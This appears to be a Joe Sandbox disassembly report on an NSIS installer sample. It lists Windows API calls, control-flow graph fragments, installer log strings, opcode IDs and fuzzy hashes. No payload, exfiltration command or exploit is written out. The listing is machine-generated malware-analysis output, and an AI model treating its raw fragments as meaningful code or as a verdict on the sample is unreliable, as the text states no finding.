                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
                                                                                                                                                                                                                                                                  • SetWindowTextW.USER32(?,00451D98), ref: 00405808
                                                                                                                                                                                                                                                                  • ShowWindow.USER32(?,0000000A), ref: 0040593C
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3282139019-0
                                                                                                                                                                                                                                                                  • Opcode ID: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                                                                                                                                                                                                  • Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                                    • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                                    • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                                                  • lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
                                                                                                                                                                                                                                                                  • lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
                                                                                                                                                                                                                                                                  • GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A
                                                                                                                                                                                                                                                                    • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                                  • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
                                                                                                                                                                                                                                                                  • RegisterClassW.USER32(00476A40), ref: 00405B36
                                                                                                                                                                                                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
                                                                                                                                                                                                                                                                  • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87
                                                                                                                                                                                                                                                                    • Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C
                                                                                                                                                                                                                                                                  • ShowWindow.USER32(00000005,00000000), ref: 00405BBD
                                                                                                                                                                                                                                                                  • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
                                                                                                                                                                                                                                                                  • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
                                                                                                                                                                                                                                                                  • GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
                                                                                                                                                                                                                                                                  • GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
                                                                                                                                                                                                                                                                  • RegisterClassW.USER32(00476A40), ref: 00405BFF
                                                                                                                                                                                                                                                                  • DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                                                                  • String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                                                                                                                                                                                  • API String ID: 608394941-2746725676
                                                                                                                                                                                                                                                                  • Opcode ID: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                                                                                                                                                                                                  • Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                    • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                  • lstrcatW.KERNEL32(00000000,00000000,open,004D70B0,00000000,00000000), ref: 00401A76
                                                                                                                                                                                                                                                                  • CompareFileTime.KERNEL32(-00000014,?,open,open,00000000,00000000,open,004D70B0,00000000,00000000), ref: 00401AA0
                                                                                                                                                                                                                                                                    • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                    • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00425576,755723A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                    • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00425576,755723A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                    • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00425576,755723A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                    • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                    • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                    • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                    • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                                                                                                                                                                                                                  • String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$open
                                                                                                                                                                                                                                                                  • API String ID: 4286501637-2478300759
                                                                                                                                                                                                                                                                  • Opcode ID: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                                                                                                                                                                                                                                  • Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 004035C4
                                                                                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0
                                                                                                                                                                                                                                                                    • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                                    • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • Inst, xrefs: 00403698
                                                                                                                                                                                                                                                                  • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
                                                                                                                                                                                                                                                                  • Error launching installer, xrefs: 00403603
                                                                                                                                                                                                                                                                  • Null, xrefs: 004036AA
                                                                                                                                                                                                                                                                  • soft, xrefs: 004036A1
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                                                                                                                                                  • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                                                                                                                                  • API String ID: 4283519449-527102705
                                                                                                                                                                                                                                                                  • Opcode ID: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                                                                                                                                                                                                                                  • Instruction ID: dd9ffda97dac1e18d9081c595fe0b3a994810ea71df15e1d022794f6b5594c79
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8551B8B1900214AFDB20DFA5DC85B9E7EACAB1435AF60857BF905B72D1C7389E408B5C

                                                                                                                                                                                                                                                                  Control-flow Graph

APIs
• GetTickCount.KERNEL32 ref: 004033F1
• GetTickCount.KERNEL32 ref: 00403492
• MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
• wsprintfW.USER32 ref: 004034CE
• WriteFile.KERNELBASE(00000000,00000000,00425576,00403792,00000000), ref: 004034FF
• WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597
Strings
Memory Dump Source
• Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1401174321.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1401275272.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1401316477.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1401316477.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1401316477.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1401316477.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1401444709.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
Similarity
• API ID: CountFileTickWrite$wsprintf
• String ID: (]C$... %d%%$pAB$vUB

APIs
• lstrlenW.KERNEL32(00445D80,00425576,755723A0,00000000), ref: 00404FD6
• lstrlenW.KERNEL32(004034E5,00445D80,00425576,755723A0,00000000), ref: 00404FE6
• lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00425576,755723A0,00000000), ref: 00404FF9
• SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
• SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
• SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
  • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00425576,755723A0,00000000), ref: 00406902
Similarity
• API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
• String ID:

APIs
  • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
• GlobalFree.KERNEL32(00000000), ref: 00402387
Strings
Similarity
• API ID: FreeGloballstrcpyn
• String ID: Exch: stack < %d elements$Pop: stack empty$open

APIs
  • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
• WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
Strings
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: PrivateProfileStringWritelstrcpyn
                                                                                                                                                                                                                                                                  • String ID: <RM>$WriteINIStr: wrote [%s] %s=%s in %s$open
                                                                                                                                                                                                                                                                  • API String ID: 247603264-1827671502

Control-flow Graph

control_flow_graph 785 4021b5-40220b call 40145c * 4 call 404f9e ShellExecuteW 796 402223-4030f2 call 4062cf 785->796 797 40220d-40221b call 4062cf 785->797 797->796
APIs
  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00425576,755723A0,00000000), ref: 00404FD6
  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00425576,755723A0,00000000), ref: 00404FE6
  • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00425576,755723A0,00000000), ref: 00404FF9
  • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
  • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
• ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202
  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
Strings
• ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
• ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
Memory Dump Source
• Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1401174321.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1401275272.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1401316477.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1401316477.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1401316477.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1401316477.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1401444709.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
Similarity
• API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
• String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
• API String ID: 3156913733-2180253247

Control-flow Graph

control_flow_graph 805 405eab-405eb7 806 405eb8-405eec GetTickCount GetTempFileNameW 805->806 807 405efb-405efd 806->807 808 405eee-405ef0 806->808 810 405ef5-405ef8 807->810 808->806 809 405ef2 808->809 809->810
APIs
• GetTickCount.KERNEL32 ref: 00405EC9
• GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4
Strings
Memory Dump Source
• Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1401174321.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1401275272.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1401316477.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1401316477.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1401316477.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1401316477.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1401444709.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
Similarity
• API ID: CountFileNameTempTick
• String ID: nsa
• API String ID: 1716503409-2209301699

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 811 402175-40218b call 401446 * 2 816 402198-40219d 811->816 817 40218d-402197 call 4062cf 811->817 818 4021aa-4021b0 EnableWindow 816->818 819 40219f-4021a5 ShowWindow 816->819 817->816 821 4030e3-4030f2 818->821 819->821
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                                                                                                                                                                                                                    • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                    • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                  • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1401174321.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1401275272.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1401316477.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1401316477.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1401316477.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1401316477.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1401444709.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Window$EnableShowlstrlenwvsprintf
                                                                                                                                                                                                                                                                  • String ID: HideWindow
                                                                                                                                                                                                                                                                  • API String ID: 1249568736-780306582
                                                                                                                                                                                                                                                                  • Opcode ID: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                                                                                                                                                                                                  • Instruction ID: f8c041d4f94449417b74c9df8c85987c6128e61f091d6cc810bdb42da7a8293a
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 13E0D832A04110DBDB08FFF5A64959E76B4EE9532A72104BFE103F61D2DA7D4D01C62D
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: MessageSend
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                  • Opcode ID: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                                                                                                                                                                                                  • Instruction ID: 11189a7010c7ef4f551f6273c6f502c25af520ce36bbf29b1e3929f99495605f
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 64F02831A10220DBD7165B349C08B273799BB81354F258637F819F62F2D2B8CC41CB4C
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                                  • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: File$AttributesCreate
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 415043291-0
                                                                                                                                                                                                                                                                  • Opcode ID: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                                                                                                                                                                                                  • Instruction ID: 4537c79132fc6b4e07af9f6f4ddc5e1db4475248beafdc935845b7fb5ee8fdc2
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 08D09E71558202EFEF098F60DD1AF6EBBA2EB94B00F11852CB252550F1D6B25819DB15
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
                                                                                                                                                                                                                                                                  • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: AttributesFile
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                  • Opcode ID: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                                                                                                                                                                                  • Instruction ID: cfdb79520ecdf627421b2718222ef799ef1344ba1afc56e39be72dea6d7b0432
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 25C04C71404905BBDA015B34DE09D1BBB66EFA1331B648735F4BAE01F1C7358C65DA19
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FileRead
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2738559852-0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                                                                                                    • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                                                                                                    • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                                                                                                    • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                                                                                                  • CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Char$Next$CreateDirectoryPrev
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 4115351271-0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: MessageSend
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FilePointer
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 973152223-0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: MessageSend
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • KiUserCallbackDispatcher.NTDLL(?,00405779), ref: 00403DBB
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CallbackDispatcherUser
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2492992576-0
